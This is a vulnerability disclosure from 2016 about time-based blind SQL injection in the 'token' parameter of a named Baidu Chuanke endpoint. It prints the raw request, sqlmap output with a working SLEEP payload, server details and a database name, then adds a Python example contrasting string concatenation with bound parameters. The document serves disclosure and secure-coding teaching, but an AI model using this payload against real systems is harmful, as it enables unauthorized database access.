
SQL injection at an endpoint of Baidu Chuanke

2016-05-29 03:00

Injection point

Injected parameter: token

Code block
GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1
Host: pop.client.chuanke.com
Accept-Language: zh-cn
Connection: keep-alive
Accept: */*
User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0
Host: pop.client.chuanke.com
Pragma: no-cache
Content-Type: text/html
DontTrackMeHere: gzip, deflate



Proof of vulnerability:

[Screenshot: 屏幕快照 2016-04-13 19.57.11.png]

Code block
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL >= 5.0.0
current database: 'kk_portal'

Remediation:

...
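The report leaves the fix open. The following is an added example, not code from the original report or from the affected service, showing why the `token` value in the request above breaks out of a string-concatenated query and how a format check plus a bound parameter handles the same input. The table and column names and the function names are hypothetical, and an in-memory SQLite database stands in for the MySQL back end.

```python
import re
import sqlite3

# Token shape in the captured request: 64 lowercase hex characters
# (the trailing "*" in the request is sqlmap's injection marker).
TOKEN_RE = re.compile(r"[0-9a-f]{64}")

# Constructed inputs: the token from the request, and the same token with the
# time-based payload from the sqlmap output appended.
GOOD_TOKEN = "796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b"
SQLMAP_TOKEN = GOOD_TOKEN + "' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI"


def make_db():
    """In-memory SQLite stand-in for the MySQL back end (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_token (token TEXT PRIMARY KEY, uid INTEGER)")
    db.execute("INSERT INTO user_token VALUES (?, ?)", (GOOD_TOKEN, 1001))
    return db


def build_query_concatenated(token):
    """Vulnerable pattern: the token becomes part of the SQL text itself."""
    return "SELECT uid FROM user_token WHERE token = '" + token + "'"


def lookup_bound(db, token):
    """Bound parameter: the driver passes the token as data, never as SQL."""
    row = db.execute("SELECT uid FROM user_token WHERE token = ?", (token,)).fetchone()
    return row[0] if row else None


def lookup_uid(db, token):
    """Hardened lookup: strict format check first, then the bound query."""
    if not isinstance(token, str) or not TOKEN_RE.fullmatch(token):
        return None  # rejected before any database work
    return lookup_bound(db, token)


if __name__ == "__main__":
    db = make_db()
    print(build_query_concatenated(SQLMAP_TOKEN))  # payload is now SQL syntax
    print(lookup_bound(db, SQLMAP_TOKEN))          # payload compared as a plain string
    print(lookup_uid(db, SQLMAP_TOKEN), lookup_uid(db, GOOD_TOKEN))
```

In the concatenated query the quotes balance, so the appended `AND (SELECT ... SLEEP(5) ...)` clause parses as SQL; with the bound parameter the whole string is only compared against the `token` column.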


Source: www.wooyun.org/bugs/wooyun-2016-0195952
